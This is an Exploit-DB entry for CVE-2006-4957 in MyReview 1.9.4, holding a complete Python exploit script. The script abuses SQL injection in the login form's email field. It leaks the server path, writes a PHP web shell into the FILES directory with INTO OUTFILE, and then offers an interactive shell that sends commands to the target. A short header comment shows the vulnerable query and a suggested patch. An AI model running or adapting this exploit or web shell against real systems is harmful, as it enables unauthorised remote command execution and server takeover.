MyReview 1.9.4 email Remote SQL Injection / Code Execution Exploit

2006-09-19T00:00:00
ID EDB-ID:2397
Type exploitdb
Reporter STILPU
Modified 2006-09-19T00:00:00

Description

MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit. CVE-2006-4957. Webapps exploit for php platform

                                        
                                            # MyReview 1.9.4 SQL Injection exploit
#
#
# http://myreview.lri.fr/
#
# in functions.php starting from line 382
# ............	
#	function GetMember ($email, $db, $mode="array")
#	{
#  		$query = "SELECT * FROM PCMember WHERE email = '$email'" ;
#		result = $db->execRequete ($query);
# .......... 
# 
# $email is not checked before used into $query
# 
# for patch 
# 
# 1. add "$email=addslashes(trim($email));" before $query
# 2. use something else, very buggy script
#
# by STILPU (dmooray[a lu']gmail.com)
#


import httplib, urllib, re, urlparse, sys

def usage():
	print """
MyReview 1.9.4 SQL Injection exploit

Usage: python exploit.py http://target/pathtomyreview/

Requires warnings to be displayed so we cat get the localpath and FILES/ to be writable

by STILPU  (dmooray[a lu']gmail.com)

"""
	sys.exit(1)

def getlocalpath(server):
	params=urllib.urlencode({'email':'\'','motDePasse':'a','ident':'Log in'})
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)
	resp=con.getresponse()
	data=resp.read()
	try:
		localpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)	
	except Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)
	return localpath
	
def sendshell(server):
	shell="'<?php error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'"
	sql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"
	headers={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
	params=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})
	con = httplib.HTTPConnection(server)
	con.request("POST",path+"Admin.php",params,headers)

def sendcmd(server):
	while 1:
		try:
			cmd=raw_input('sh$ ')
			cmd=cmd.replace(" ","+")
			con = httplib.HTTPConnection(target)
			con.request("GET",path+"FILES/STILPU.php?cmd="+cmd)
			resp=con.getresponse()
			data=resp.read()
			if (cmd=="exit" or cmd=="quit"): break
			print data
		except KeyboardInterrupt: break	


if __name__ == '__main__':

	if len(sys.argv) < 2:
		usage()		
	
	else:
		url = sys.argv[1]
		url = urlparse.urlsplit(url)
		target = url[1]
		path = url[2]
		
		sendshell(target)
		sendcmd(target)

# milw0rm.com [2006-09-19]